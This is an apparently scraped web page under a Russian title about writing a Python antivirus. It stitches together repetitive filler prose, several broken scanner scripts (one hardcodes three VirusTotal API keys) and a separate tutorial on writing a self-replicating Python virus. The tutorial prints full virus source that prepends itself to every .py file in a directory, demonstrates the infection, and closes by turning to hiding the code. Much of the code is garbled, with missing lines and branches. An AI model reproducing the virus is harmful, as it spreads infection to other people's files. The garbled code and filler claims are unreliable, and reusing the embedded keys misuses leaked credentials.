Как написать свой антивирус на питоне


A simple antivirus coded in python capable of scanning selected files and deleting files that it detects as infected. This antivirus uses a large list of MD5, SHA1 and SHA256 malware hashes (many of which coming from this repo — https://github.com/Len-Stevens/MD5-Malware-Hashes) to determine infections. However as this project progresses I would like to implement machine learning detection with the long term goal of becoming a fully functioning antivirus.

Thank You! :)


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Python Antivirus Scanner:

With internet security becoming more and more important, it is crucial that you invest in a good antivirus. One of the best things about antivirus software is that it is free to use. However, there are a few things that you can do to take your security to the next level. For example, you can use a python antivirus scanner, which uses virustotal or online antivirus scanner. The blog will explain just how to create a python antivirus scanning script and how to use a python antivirus scanner.

A lot of people might not be aware that the python antivirus scanner is a really popular, low-tech, simple and effective way to protect your computer. It is not as complicated and can be a really good option if you are more of a computer newbie. This particular blog post is a tutorial on how to use the python antivirus scanner. It will give you the basic understanding of how this online antivirus scanner works and how to use it.

The main purpose of this blog is to introduce newbies to the world of malware scanning using python antivirus scanner. In this blog, we’ll discuss how to use virustotal and online antivirus scanner for python antivirus scanner. This is a very useful blog for anyone who want to scan their software for malware.A lot of people are taking a step back and thinking about switching to antivirus scanning with a program like python antivirus scanner. This blog will show you how to make the switch to using a program like this.

There are many software scanner to choose from with many different uses. Depending on your needs, you might choose to use one or more of these open source software as a solution. For instance, you might use an antivirus scanner like Clamav or AVAST. But another option would be to use a scanner like python antivirus scanner that is completely free and easy to use. In this blogpost, we will take a look at some online antivirus scanner.

Is your computer always running slowly, or does your computer seem to get infected by new viruses everyday? You may want to run a scan with a reputable antivirus scanner, but those can be slow. What if you could do this in under a minute? This blog will show you how to use python antivirus scanner with virustotal or online antivirus scanner.

Virustotal is an online database that houses the results of various antivirus scans. It has extensive information on the antivirus scans that are currently taking place on the web. It is a database of scanned viruses, and does not provide any other features that a regular antivirus application would provide. Virustotal is not a replacement for a regular antivirus app.When you’re considering buying a new security program, you should always turn to the Internet to find out which one is the best. Online reviews and ratings from experts are always good to refer to. When you get to the point of buying an antivirus scanner, you should be aware of a couple of options. The first is to use a site like virustotal.com where you can compare the various antivirus scanners. The second option is to use a simple antivirus scanner like one you find on the Internet. This blog will look at how you can do both.

import hashlib
import os
from functools import partial
import json
from tkinter import *
from tkinter import filedialog

def scan_sha256(file):
      virus_found = False

      with open(file,"rb") as f:
            bytes = f.read()
            readable_hash = hashlib.sha256(bytes).hexdigest();

            print("The SHA256 hash of this file is: " + readable_hash)

            with open("SHA256.txt",'r') as f:
                lines = [line.rstrip() for line in f]
                for line in lines:
                      if str(readable_hash) == str(line.split(";")[0]):
                            virus_found = True


      if not virus_found:
            print("File is safe!")
            label_status.configure(text="Status: File is safe!", width = 100, height = 4,  
                            fg = "green")
            print("Virus detected! File quarentined")
            label_status.configure(text="Status: Virus detected! File Deleted!", width = 100, height = 4,  
                            fg = "red")

def scan_md5(file):
      virus_found = False

      with open(file,"rb") as f:
            bytes = f.read()
            readable_hash = hashlib.md5(bytes).hexdigest();

            print("The MD5 hash of this file is: " + readable_hash)

            with open("MD5 Virus Hashes.txt",'r') as f:
                lines = [line.rstrip() for line in f]
                for line in lines:
                      if str(readable_hash) == str(line.split(";")[0]):
                            virus_found = True


      if not virus_found:
            print("File is safe!")
            label_status.configure(text="Status: File is safe!", width = 100, height = 4,  
                            fg = "green")

            print("Virus detected! File quarentined")
            label_status.configure(text="Status: Virus detected! File Deleted!", width = 100, height = 4,  
                            fg = "red")

def scan(file):
      virus_found = False

      with open(file,"rb") as f:
            bytes = f.read()
            readable_hash = hashlib.sha1(bytes).hexdigest();

            print("The SHA1 hash of this file is: " + readable_hash)
            with open('SHA1 HASHES.json', 'r') as f:
                dataset = json.loads(f.read())

                for index, item in enumerate(dataset["data"]):
                      if str(item['hash']) == str(readable_hash):
                          virus_found = True


      if not virus_found:
            print("File is safe!")
            label_status.configure(text="Status: File is safe!", width = 100, height = 4,  
                            fg = "green")

            print("Virus detected! File quarentined")
            label_status.configure(text="Status: Virus detected! File Deleted!", width = 100, height = 4,  
                            fg = "red")
def browseFiles():
    filename = filedialog.askopenfilename(initialdir = "/", 
                                          title = "Select a File", 
                                          filetypes = (("Text files", 
                                                       ("all files", 
    opened_file.configure(text="File Opened: "+filename)

window = Tk() 



window.config(background = "white") 
label_file_explorer = Label(window,  
                            text = "Antivirus", 
                            width = 100, height = 4,  
                            fg = "blue"
                            ,bg = "white")

label_file_explorer.config(font=("Courier", 15))

label_status = Label(window,  
                            text = "Status: ", 
                            width = 100, height = 4,  
                            fg = "blue",
                     bg = "white")

label_status.config(font=("Courier", 10))

opened_file = Label(window,  
                            text = "File Opened: ", 
                            width = 100, height = 4,  
                            fg = "blue",
                    bg = "white")

opened_file.config(font=("Courier", 10))
button_explore = Button(window,  
                        text = "Browse Files", 
                        command = browseFiles)
label_file_explorer.grid(column = 1, row = 1)
label_file_explorer.place(x=-350, y=0)

opened_file.grid(column = 1, row = 1)
opened_file.place(x=-150, y=250)

label_status.grid(column = 1, row = 1)
label_status.place(x=-150, y=300)
button_explore.grid(column = 1, row = 2)
button_explore.place(x=205, y=400)


Python Antivirus Scanner Using Virustotal Api:

Finding the best online antivirus scanner for your computer can be difficult. Sites like Virus Total can provide easy to use online antivirus scanner for your computer. This blog post will help you determine which online antivirus scanner is best for your computer by reviewing both the virustotal.com and antivirus.kaspersky.com online antivirus scanner.

Viruses are a threat that can’t be ignored. They are one of the most feared and devastating threats to a PC or laptop’s stability. It is a good idea to invest in a security software that can detect viruses and threats before they have a chance to cause havoc to the system. Viruses are a threat that evolve much faster than security software and so it is important to get the latest updates from time to time. This blog will look at our python antivirus scanner, which uses virustotal.

If you’re looking for leading antivirus scanners for your business, then you may want to take a look at python antivirus scanner. This software is a solution for those who are in need of a fast, lightweight, and effective antivirus solution. It is an open source automation tool which can take care of scanning files and running antivirus tools. It can be used with or without a server. This software is an ideal solution for small businesses and large organizations.

Users are becoming more savvy about security by using a combination of antivirus and malware scanners, but the key is to find a balance of both. This blog discusses how to use or install a new antivirus scanner as an alternative to virustotal.python antivirus scanner is a software that does a quick scan with online antivirus scanners like virustotal.

python antivirus scanner is a software that is used to scan your python files for viruses and malware. It is a good tool to use when you are developing your python code. It is a software that was created by a team of python programmers who had a similar experience as you. It is a free software that allows you to scan your code for any kind of viruses and malware. Using the python antivirus software is easy. You can use it on your local system or on the web. It will scan your files for any kind of viruses and malware. It is a program that is always online, so you can use it without any issues. It is good to use with other antivirus software to ensure that the path is clear of any potential threats.

You will need to install a python antivirus scanner to ensure that your python code is safe from the viruses and malware. You will need to make sure that your python code is checked by an online antivirus scan and that it is approved. This is where the python antivirus scanner comes into play. This is a python antivirus scanner that will scan your python code and make sure that it is virus-free. You can check for a virus online as well or you can use a virustotal. If you are using a python antivirus scanner, you will want to install this on your computer and add to your particular python code.

import hashlib, os, requests, struct, wx, webbrowser
import winreg as reg
from bs4 import BeautifulSoup

# path = input("Enter file path")
# print("Remove same files")

class FilePro:
    path = None
    name = None
    full_path = None
    type = None

    def __init__(self, path, name):
        self.path = path
        self.name = name
        self.full_path = self.path + "\" + self.name
            self.type = name[name.rindex("."): len(name)]
            self.type = ""

    def get_file_md5(self):
        file = open(self.full_path, "rb")
        content = file.read()
        md5 = hashlib.md5()
        return md5.hexdigest()

    def get_file_sha256(self):
        file = open(self.full_path, "rb")
        content = file.read()
        sha256 = hashlib.sha256()
        return sha256.hexdigest()

    def rename(self, name):
        new_full_path = self.path + "\" + name + self.type
        if os.path.exists(new_full_path) and new_full_path != self.full_path:
        os.rename(self.full_path, new_full_path)
        self.name = name
        self.full_path = new_full_path

    def modify(self):
        file = open(self.full_path, "ab+")

    def get_360(self):
        params = {"md5s": (None, self.get_file_md5()),
                  "format": (None, "XML"),
                  "product": (None, "360zip"),
                  "combo": (None, "360zip_main"),
                  "v": (None, "2"),
                  "osver": (None, "5.1"),
                  "vk": (None, "a03bc211"),
                  "mid": (None, "8a40d9eff408a78fe9ec10a0e7e60f62")}
        return requests.post("http://qup.f.360.cn/file_health_info.php", files=params)

    def upload_vt(self, apikey = dict()):

        if os.path.getsize(self.full_path) > 31457280:
            return False

        url = 'https://www.virustotal.com/vtapi/v2/file/scan'

        if apikey is None:
            apikey = {1: "8dd0c36fd4ef57dc1effd53d580a2d2c4413c65041abcc103fe60641dc001ea4",
                      2: "a2b51c4511a5da05b595cc57e57aad2428db72ed28d66d9c72ca394f6ce47963",
                      3: "e08d3ae2419f5a7f27b37db6adaf27b6d31d06d1c522b71d9b0ad8f25b542702"}

        i = 1

        params = {'apikey': apikey[i]}
        file = {'file': (open(self.full_path, 'rb'))}
        while True:
                response = requests.post(url, params=params, files=file)
                if response.status_code == 200:
                if response.status_code == 204:
                    if i >= len(apikey):
                        i = 1
                        i = i + 1
                    params = {'apikey': apikey[i]}
                    print("Upload: 204")
                if response.status_code == 400 or response.status_code == 403:
                    wx.MessageBox("Invalid API key, Please enter again!", "Error")
                    return "wrongkey"
                if response.status_code == 403:
                    wx.MessageBox("Your IP Address is banned by VirusTotal. You may change your IP Address by using proxy." + "n" + "Click to try again.")
                if wx.MessageBox("Uploading files fail. Please Check your Internet Connection." + "n" + "Do you want to try again?", caption= "Error", style=wx.YES_NO) ==2:
                    return "Fail"

        report = response.json()
        if report['response_code'] == 1:
            return True
            return False

    def get_vt_report(self, apikey = dict(), use_crawler = True):
        url = 'https://www.virustotal.com/vtapi/v2/file/report'
        if apikey is None:
            apikey = {1: "8dd0c36fd4ef57dc1effd53d580a2d2c4413c65041abcc103fe60641dc001ea4",
                      2: "a2b51c4511a5da05b595cc57e57aad2428db72ed28d66d9c72ca394f6ce47963",
                      3: "e08d3ae2419f5a7f27b37db6adaf27b6d31d06d1c522b71d9b0ad8f25b542702"}

        i = 1

        params = {'apikey': apikey[i], 'resource': self.get_file_sha256()}
        while True:
                response = requests.get(url, params=params)
                if response.status_code == 200:
                    report = response.json()
                    if report["response_code"] == -2:
                        return "Analyzing"
                    if report["response_code"] == 0:
                        return "Unknown"
                if response.status_code == 204:
                    if i >= len(apikey):
                        if use_crawler:
                            return self.get_vt_report_html()
                            i = 1
                        i = i + 1
                    params = {'apikey': apikey[i], 'resource': self.get_file_sha256()}
                if response.status_code == 400:
                    wx.MessageBox("Invalid API key, Please enter again!", "Error")
                    return "wrongkey"
                if response.status_code == 403:
                    wx.MessageBox("Your IP Address is banned by VirusTotal. You may change your IP Address by using proxy." + "n" + "Click to try again.")
                if wx.MessageBox("Getting report fails. Please Check your Internet Connection." + "n" + "Do you want to try again?", caption= "Error", style=wx.YES_NO) ==2:
                    return "Fail"
        result = response.json()
        if result["response_code"] ==0:
            return result

        kaspersky = ""
        eset = ""
        malwarebytes = ""
        microsoft = ""

        if "Kaspersky" in report["scans"]:
            kaspersky = str(report["scans"]["Kaspersky"]["result"])
        if "ESET-NOD32" in report["scans"]:
            eset = str(report["scans"]["ESET-NOD32"]["result"])
        if "Malwarebytes" in report["scans"]:
            malwarebytes = str(report["scans"]["Malwarebytes"]["result"])
        if "Microsoft" in report["scans"]:
            microsoft = str(report["scans"]["Microsoft"]["result"])
        threat = kaspersky + eset + malwarebytes + microsoft
        threat = threat.lower()
        result['detections'] = threat
        return result

    def get_vt_report_html(self):
        print("use crawler")
        report = {'response_code': 0, 'positives': 0, 'detections': "", 'total': 0}
        # cookies = browser_cookie3.load()
        # headers = {
        #     'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'
        # }
        while True:
                url = "https://www.virustotal.com/en/file/" + self.get_file_sha256() + "/analysis/"
                response = requests.get(url)
                if wx.MessageBox("Getting report fails. Please Check your Internet Connection." + "n" + "Do you want to try again?", caption= "Error", style=wx.YES_NO) ==2:
                    return "Fail"
            soup = BeautifulSoup(response.text, 'lxml')
                recap = soup.find(src='https://www.google.com/recaptcha/api.js')
                if recap is not None:
                    wx.MessageBox("Click to open browser to pass the CAPTCHA")
                    wx.MessageBox('When you finished, Click OK')
                wx.MessageBox("Your IP Address is banned by VirusTotal. You may change your IP Address by using proxy." + "n" + "Click to try again.")

            # if str(soup.find(src= 'https://virustotalcloud.appspot.com/static/img/wait.gif').string).find('que') != -1:
            #     time.sleep(5)
            #     continue
            a = soup.find(class_='text-green')
            if a is not None:
                if str(a.string).find('0 / 0') !=-1:
                    return "Analyzing"

        if soup.find(class_="alert-heading") is not None:
            return "Unknown"

        report['response_code'] = 1

            t = str(soup.find(class_='row').div.table.find(class_='text-red').string).strip()
            report['positives'] = t[0:t.find('/')].strip()
            report['total'] = t[t.find('/') + 2: len(t)].strip()
            return report

        results = soup.find(id="active-tab").find(id="antivirus-results").find_all(class_="ltr text-red")
        for result in results:
            name = str(result.parent.td.string).rstrip().strip().strip("n")
            if name == "Kaspersky" or name == "ESET-NOD32" or name == "Malwarebytes" or name == "Microsoft":
                report['detections'] = str(report['detections']) + str(result.string).strip().strip("n")
        report['detections'] = report['detections'].lower()
        return report

    def get_threat_type(self, report, sensitivity, is_grayware = True):
        if report == "Fail":
            return "Fail"
        if report == "Unknown":
            return 'Unknown'
        detected_num = report["positives"]
        threat = report['detections']

        if int(detected_num) ==0:
            return "Clean"

        final_verdict = ""

        type_category = {
            "Win32.":                   ["win32"],
            "Win64.":                   ["win64"],
            "JS.":                      ["js"],
            "VBS.":                     ["vba", "vbs"],
            "Shell.":                   ["shell"],
            "Html.":                    ["html"],
            "Macro.":                   ["doc", "macro", "office"],
            "PDF.":                     ["pdf"],
            "Script.":                  ["script", "swf"],
            "Email.":                   ["email"],
            "Java.":                    ["java"],
            "Linux.":                   ["linux"],
            "Android.":                 ["android"]

        for name, rules in type_category.items():
            for rule in rules:
                if threat.find(rule) != -1:
                    final_verdict = final_verdict + name


        threat_category = {
            "Phishing.Generic":         ["phishing"],
            "Exploit.Generic":          ["exp", "cve"],
            "Worm.Generic":             ["worm"],
            "Ransom.Generic":           ["ransom", "code", "mbr"],
            "Rootkit.Generic":          ["root", "uefi", "boot"],
            "Backdoor.Bot":             ["bot", "fareit", "rat"],
            "Backdoor.Generic":         ["backdoor", "bds"],
            "Trojan.Banker":            ["banker", "emotet"],
            "Trojan.Spy":               ["spy"],
            "Trojan.Downloader":        ["downloader"],
            "Trojan.PasswordStealer":   ["pws", "psw", "passwordstealer"],
            "Trojan.Dropper":           ["drop"],
            "Trojan.Injector":          ["inject"],
            "Trojan.CoinMiner":         ["coin", "mine"],
            "Trojan.Generic":           ["trojan", "virtool", "vho", "kry", "msil", "dangerous", "generik", "adwin"]
        print(int(detected_num) / int(report['total']))

        if is_grayware:
            threat_category["Grayware.Unwanted"] = ["potentially unwanted", "adware", "pua", "pup", "unwan"]
            threat_category["Grayware.RiskTool"] = ["potentially unsafe", "hacktool", "risk", "not-a-virus"]

        for name, rules in threat_category.items():
            for rule in rules:
                if threat.find(rule) != -1:
                    if final_verdict == "":
                         return "Win32." + name
                        return final_verdict + name

        if final_verdict != "":
            return final_verdict + "Trojan.Generic"

        threshold = int(detected_num) / int(report['total'])
        if threshold > (1 - (sensitivity / 100)):
            return "Malware.Confidence:" + str(int(threshold * 100)) + "%"
            return "NoRisk"

    def classify(self, threatname):
        self.rename(str(threatname) + "_" + self.get_file_md5())

def readFileChar(path):
        fileHandle = open(path, "rb")
        data_id = struct.unpack("h", fileHandle.read(2))
        return data_id[0]

def getShifting(path):
        fileHandle = open(path, "rb")
        fileHandle.seek(60, 0)
        data_id = struct.unpack("h", fileHandle.read(2))[0]
        # print data_id
        fileHandle = open(path, "rb")
        fileHandle.seek(data_id, 0)
        pe = struct.unpack("h", fileHandle.read(2))[0]
        return pe

def isPE(path):
    if readFileChar(path) == 23117 and getShifting(path) == 17744:
        return True

def emul(path, PE=True):
    allfiles = set()
    files = os.walk(path)
    for interfile in files:
        file_name = interfile[2]
        for filename in file_name:
            if PE:
                if isPE(interfile[0] + "\" + filename):
                    allfiles.add(FilePro(interfile[0], filename))
                allfiles.add(FilePro(interfile[0], filename))
    return allfiles

def print_result(allfiles=set()):
    for file in allfiles:
        print(file.full_path + "   " + file.get_file_md5())

def remove_same(path):
    i = ""
    allfiles = emul(path)
    for file in allfiles:
        if i.find(file.get_file_md5()) != -1:
            i = i + " " + file.get_file_md5()
    return emul(path)

def add_context_menu(menu_name, command, reg_root_key_path, reg_key_path, shortcut_key):

    key = reg.OpenKey(reg_root_key_path, reg_key_path)
    reg.SetValue(key, menu_name, reg.REG_SZ, menu_name + '(&{0})'.format(shortcut_key))
    sub_key = reg.OpenKey(key, menu_name)
    reg.SetValue(sub_key, 'command', reg.REG_SZ, command + ' "%1"')

def delete_reg_key(root_key, key, menu_name):

        parent_key = reg.OpenKey(root_key, key)
    except Exception as msg:
    if parent_key:
            menu_key = reg.OpenKey(parent_key, menu_name)
        except Exception as msg:
        if menu_key:
                reg.DeleteKey(menu_key, 'command')
            except Exception as msg:
                reg.DeleteKey(parent_key, menu_name)

def get_file_sha256(path):
    file = open(path, "rb")
    content = file.read()
    sha256 = hashlib.sha256()
    return sha256.hexdigest()

Python Antivirus Realtime Scan:

Using a python antivirus scanner is a good way to make sure your work is safe. One of the easiest ways to do this is to use the virustotal online antivirus scanner. If you’re using a computer, you can use the online antivirus scanner by opening the command prompt in Administrator mode and typing “test.py -s https://www.virustotal.com/en/file/fbe8c3f2e2c0b48d9b9f859a5d5bd5af0592c6d3b6b7c6b4f6f4c4c4d856c5/analysis/1445851590/”.

Python antivirus scanner is a free open source antivirus scanner for python that provides a GUI for the operating system (Linux, Windows, Mac OS X, etc.) and scans files for viruses, worms, and trojans. It’s a Python 3.5+ application.

python antivirus scanner is a python program that scans files looking for malicious content.
Install a python antivirus scanner using virustotal or online antivirus scanner.Virustotal is a website where you can upload a file to check for viruses. It is a great tool for checking the safety of your files. It is very easy to use. If you are only getting started with your antivirus program, it is a great resource to learn more about the security of your programs. Virustotal also has a mobile app that is available for android and iOS. Online antivirus scanners are also a great tool. They are faster than the same virus scanner on your computer. Online virus scanners can scan your files much faster.

This is a blog post on how to use a python antivirus scanner by sending a request to virustotal or any other online antivirus scanner.python antivirus scanner is a Python based program for antivirus scanning. It automatically scans for malware and viruses in the Python source code and can be used as a standalone virus scanner, or as a container-based scanner. It uses virustotal to check the source code for virustotal.com or online antivirus scanner.
An online virus scanner can be a great way to check if your code has been infected. In order to use a virus scanner, open up a terminal and type in the following two commands:

The python antivirus scanner is a python script that is designed to scan your computer for the latest and most common computer viruses. This means that you can use the python antivirus scanner to scan your computer if you suspect that it may be infected with a virus. The python antivirus scanner can also be used to scan your computer for viruses that may have been removed with other antivirus software. The python antivirus scanner is a simple tool that you can use to scan your computer for viruses.Python antivirus scanner with virustotalPython antivirus scanner is a tool that scans a python project for common virus threats.

import pyfiglet
import hashlib
from colorama import init
from colorama import Fore, Back, Style
from virustotal_python import Virustotal
import requests
from pathlib import Path
from pprint import pprint
import os
    with open('VirusTotal_APIKey.txt') as f:
        data = f.readlines()
    APIKey = ''.join(data)
    createfile = open("VirusTotal_APIKey.txt", "a")
    print(Fore.LIGHTYELLOW_EX,"[Warning] Enter your VirusTotal API Key n")
    APIKeyInput = input("")
    os.system('cls' if os.name == 'nt' else 'clear')
    ascii_banner = pyfiglet.figlet_format("Lightning")
    print(Fore.CYAN + ascii_banner)
    print(Fore.MAGENTA , "[Fast Virus Scanner] - Created by Nemesis0U n n")
    BUF_SIZE = 65536
    sha1 = hashlib.sha1()
    sha256 = hashlib.sha256()
    print("Enter path of a file to scan")
    FilePath = input("")
    with open(FilePath, 'rb') as f:
        while True:
          data = f.read(BUF_SIZE)
          if not data:
    SHA1_of_file = sha1.hexdigest()
    SHA256_of_file = sha256.hexdigest()
    print("File Name: ", Path(FilePath).stem)
    print("SHA1: " , SHA1_of_file)
    print("SHA256: " , SHA256_of_file)
        with Virustotal(API_KEY=APIKey, API_VERSION="v3") as vtotal:
             resp = vtotal.request(f"files/{SHA256_of_file}")
             serverresponse = str(resp.data)
             print("Scan Results: n")
             if((serverresponse.count("'category': 'malicious'")) >= 5):
                 print(Fore.LIGHTRED_EX,"This file is flagged by " , (serverresponse.count("'category': 'malicious'")) , " antivirus softwares as malicious")
             elif((serverresponse.count("'category': 'malicious'")) >= 2):
                print(Fore.LIGHTYELLOW_EX ,"This file is flagged by " , (serverresponse.count("'category': 'malicious'")) , " antivirus softwares as malicious")
             elif((serverresponse.count("'category': 'malicious'")) == 1):
                 print(Fore.LIGHTWHITE_EX ,"This file is flagged by " , (serverresponse.count("'category': 'malicious'")) , " antivirus software as malicious")
                 print(Fore.LIGHTGREEN_EX ,"This file is flagged by " , (serverresponse.count("'category': 'malicious'")) , " antivirus softwares as malicious")
        print("File not found in VirusTotal, sending it for analysis...")
        with Virustotal(API_KEY=APIKey, API_VERSION="v3") as vtotal:
         FilePathConverted = {"file": (os.path.basename(FilePath), open(os.path.abspath(FilePath).replace("\\","\"), "rb"))}
         resp = vtotal.request("files", files=FilePathConverted, method="POST")
         serverresponse = str(resp.data)
         print("File successfully sent for analysis, re-scan it to get results")
    wait = input("Press any key to continue n")
    os.system('cls' if os.name == 'nt' else 'clear')


It’s important to always be on the lookout for malware in your system. This is especially true on the internet where you never know what’s floating around. To help make sure you have your bases covered, we would like to share a blog post about how to use a virustotal or online antivirus scanner when using python antivirus scanner.
We are excited to have the opportunity to share our blog with you and to know that you have come to another great conclusion.

This is a great blog to read if you can’t use virustotal because you don’t have a virus scanner. It is important to scan your files after you have finished coding and with this article we provide you with step by step instructions on how to do that. Let us know if you have any questions or suggestions. We would love to hear from you! If you would like to get a more detailed tutorial on using online antivirus scanner

To scan your python code with virustotal or an online antivirus scanner. If you work in a field where you write programming code then it is a good idea to get scans done of your code every few weeks to make sure it is virus-free. You can read more about how to set up your own crawlers or scanners in our blog post.Virustotal is a free online virus scanner that can be used to find out which files are infected with viruses or malware, and is often recommended by tech experts. This free online virus scanner can be used to scan files on a computer This is a great article on how to check your website for vulnerabilities.

There is a good discussion on the different ways to check your website and the article also includes a good description on what to look for to make sure that your website is protected.Virustotal is a secure website that will perform online scans for viruses and malware in a variety of files. This is an interesting site that can be used to scan your files for potential viruses and other malware.

14 minute read


I was relaxing on a beach during my summer leave when I received a mail from a reader that asked me if it is technically possible to write a virus using Python.

The short answer: YES.

The longer answer: yes, BUT…

Let’s start by saying that viruses are a little bit anachronistic in 2021… nowadays other kinds of malware (like worms for example) are far more common than viruses. Moreover, modern operative systems are more secure and less prone to be infected than MS-DOS or Windows 95 were (sorry Microsoft…) and people are more aware of the risk of malware in general.

Moreover, to write a computer virus, probably Python is not the best choice at all. It’s an interpreted language and so it needs an interpreter to be executed. Yes, you can embed an interpreter to your virus but your resulting virus will be heavier and a little clunky… let’s be clear, to write a virus probably other languages that can work to a lower level and that can be compiled are probably a better choice and that’s why in the old days it was very common to see viruses written in C or Assembly.

That said, it is still possible to write computer viruses in Python, and in this article, you will have a practical demonstration.

I met my first computer virus in 1988. I was playing an old CGA platform game with my friend Alex, that owned a wonderful Olivetti M24 computer (yes, I’m THAT old…) when the program froze and a little ball started to go around the screen. We had never seen anything like that before and so we didn’t know it back then, but we were facing the Ping-Pong virus one of the most famous and common viruses ever… at least here in Italy.

Now, before start, you know I have to write a little disclaimer.

This article will show you that a computer virus in Python is possible and even easy to be written. However, I am NOT encouraging you to write a computer virus (neither in Python nor in ANY OTHER LANGUAGES), and I want to remember you that HARMING AN IT SYSTEM IS A CRIME!

Now, we can proceed.

According to Wikipedia…

a computer virus is a computer program that, when executed, replicates itself by modifying other computer programs and inserting its own code. If this replication succeeds, the affected areas are then said to be “infected” with a computer virus, a metaphor derived from biological viruses.

That means that our main goal when writing a virus is to create a program that can spread around and replicate infecting other files, usually bringing a “payload”, which is a malicious function that we want to execute on the target system.

Usually, a computer virus does is made by three parts:

  1. The infection vector: this part is responsible to find a target and propagates to this target
  2. The trigger: this is the condition that once met execute the payload
  3. The payload: the malicious function that the virus carries around

Let’s start coding.

    # retrieve the virus code from the current infected script
    virus_code = get_virus_code() 

    # look for other files to infect
    for file in find_files_to_infect():
        infect(file, virus_code)

    # call the payload

# except:
#     pass

    # delete used names from memory
    for i in list(globals().keys()):
        if(i[0] != '_'):
            exec('del {}'.format(i))

    del i

Let’s analyze this code.

First of all, we call the get_virus_code() function, which returns the source code of the virus taken from the current script.

Then, the find_files_to_infect() function will return the list of files that can be infected and for each file returned, the virus will spread the infection.

After the infection took place, we just call the summon_chaos() function, that is — as suggested by its name — the payload function with the malware code.

That’s it, quite simple uh?

Obviously, everything has been inserted in a try-except block, so that to be sure that exceptions on our virus code are trapped and ignored by the pass statement in the except block.

The finally block is the last part of the virus, and its goal is to remove used names from memory so that to be sure to have no impact on how the infected script works.

Okay, now we need to implement the stub functions we have just created! :)

Let’s start with the first one: the get_virus_code() function.

To get the current virus code, we will simply read the current script and get what we find between two defined comments.

For example:

def get_content_of_file(file):
    data = None
    with open(file, "r") as my_file:
        data = my_file.readlines()

    return data

def get_virus_code():

    virus_code_on = False
    virus_code = []

    code = get_content_of_file(__file__)

    for line in code:
        if "# begin-virusn" in line:
            virus_code_on = True

        if virus_code_on:

        if "# end-virusn" in line:
            virus_code_on = False

    return virus_code

Now, let’s implement the find_files_to_infect() function. Here we will write a simple function that returns all the *.py files in the current directory. Easy enough to be tested and… safe enough so as not to damage our current system! :)

import glob

def find_files_to_infect(directory = "."):
    return [file for file in glob.glob("*.py")]

This routine could also be a good candidate to be written with a generator. What? You don’t know generators? Let’s have a look at this interesting article then! ;)

And once we have the list of files to be infected, we need the infection function. In our case, we will just write our virus at the beginning of the file we want to infect, like this:

def get_content_if_infectable(file):
    data = get_content_of_file(file)
    for line in data:
        if "# begin-virus" in line:
            return None
    return data

def infect(file, virus_code):
    if (data:=get_content_if_infectable(file)):
        with open(file, "w") as infected_file:

Now, all we need is to add the payload. Since we don’t want to do anything that can harm the system, let’s just create a function that prints out something to the console.

def summon_chaos():
  # the virus payload
  print("We are sick, fucked up and complicatednWe are chaos, we can't be cured")

Ok, our virus is ready! Let’s see the full source code:

# begin-virus

import glob

def find_files_to_infect(directory = "."):
    return [file for file in glob.glob("*.py")]

def get_content_of_file(file):
    data = None
    with open(file, "r") as my_file:
        data = my_file.readlines()

    return data

def get_content_if_infectable(file):
    data = get_content_of_file(file)
    for line in data:
        if "# begin-virus" in line:
            return None
    return data

def infect(file, virus_code):
    if (data:=get_content_if_infectable(file)):
        with open(file, "w") as infected_file:

def get_virus_code():

    virus_code_on = False
    virus_code = []

    code = get_content_of_file(__file__)

    for line in code:
        if "# begin-virusn" in line:
            virus_code_on = True

        if virus_code_on:

        if "# end-virusn" in line:
            virus_code_on = False

    return virus_code

def summon_chaos():
    # the virus payload
    print("We are sick, fucked up and complicatednWe are chaos, we can't be cured")

# entry point 

    # retrieve the virus code from the current infected script
    virus_code = get_virus_code() 

    # look for other files to infect
    for file in find_files_to_infect():
        infect(file, virus_code)

    # call the payload

# except:
#     pass

    # delete used names from memory
    for i in list(globals().keys()):
        if(i[0] != '_'):
            exec('del {}'.format(i))

    del i

# end-virus

Let’s try it putting this virus in a directory with just another .py file and let see if the infection starts. Our victim will be a simple program named [numbers.py](http://numbers.py) that returns some random numbers, like this:

 # numbers.py

import random


for _ in range(10):
  print (random.randint(0,100))

When this program is executed it returns 10 numbers between 0 and 100, super useful! LOL!

Now, in the same directory, I have my virus. Let’s execute it:

/playgrounds/python/first ❯ python ./first.py                                                                          02:30:42 PM
We are sick, fucked up and complicated
We are chaos, we can't be cured

As you can see, our virus has started and has executed the payload. Everything is fine, but what happened to our [numbers.py](http://numbers.py) file? It should be the victim of the infection, so let’s see its code now.

# begin-virus

import glob

def find_files_to_infect(directory = "."):
    return [file for file in glob.glob("*.py")]

def get_content_of_file(file):
    data = None
    with open(file, "r") as my_file:
        data = my_file.readlines()

    return data

def get_content_if_infectable(file):
    data = get_content_of_file(file)
    for line in data:
        if "# begin-virus" in line:
            return None
    return data

def infect(file, virus_code):
    if (data:=get_content_if_infectable(file)):
        with open(file, "w") as infected_file:

def get_virus_code():

    virus_code_on = False
    virus_code = []

    code = get_content_of_file(__file__)

    for line in code:
        if "# begin-virusn" in line:
            virus_code_on = True

        if virus_code_on:

        if "# end-virusn" in line:
            virus_code_on = False

    return virus_code

def summon_chaos():
    # the virus payload
    print("We are sick, fucked up and complicatednWe are chaos, we can't be cured")

# entry point 

    # retrieve the virus code from the current infected script
    virus_code = get_virus_code() 

    # look for other files to infect
    for file in find_files_to_infect():
        infect(file, virus_code)

    # call the payload

# except:
#     pass

    # delete used names from memory
    for i in list(globals().keys()):
        if(i[0] != '_'):
            exec('del {}'.format(i))

    del i

# end-virus
# numbers.py

import random


for _ in range(10):
  print (random.randint(0,100))

And as expected, now we have our virus before the real code.

Let’s create another .py file in the same directory, just a simple “hello world” program:

/playgrounds/python/first ❯ echo 'print("hello world")' > hello.py

and now, let’s execute the [numbers.py](http://numbers.py) program:

/playgrounds/python/first ❯ python numbers.py                                                                          02:35:12 PM
We are sick, fucked up and complicated
We are chaos, we can't be cured

As you can see, the program still does whatever it was expected to do (extract some random numbers) but only after having executed our virus, which has spread to other *.py files in the same directory and has executed the payload function. Now, if you look at the [hello.py](http://hello.py) file, you will see that it has been infected as well, as we can see running it:

/playgrounds/python/first ❯ python hello.py                                                                            02:40:01 PM
We are sick, fucked up and complicated
We are chaos, we can't be cured
hello world

Trying to hide the virus code a little more

Now, even if this virus could be potentially dangerous, it is easily detectable. You don’t have to be Sherlock Holmes to recognize a virus that is written in plain text and starts with # begin-virus, right?

So what can we do to make it a little harder to find?

Not much more, since we’re writing it in Python and Python is an interpreted language… however, maybe we can still do something.

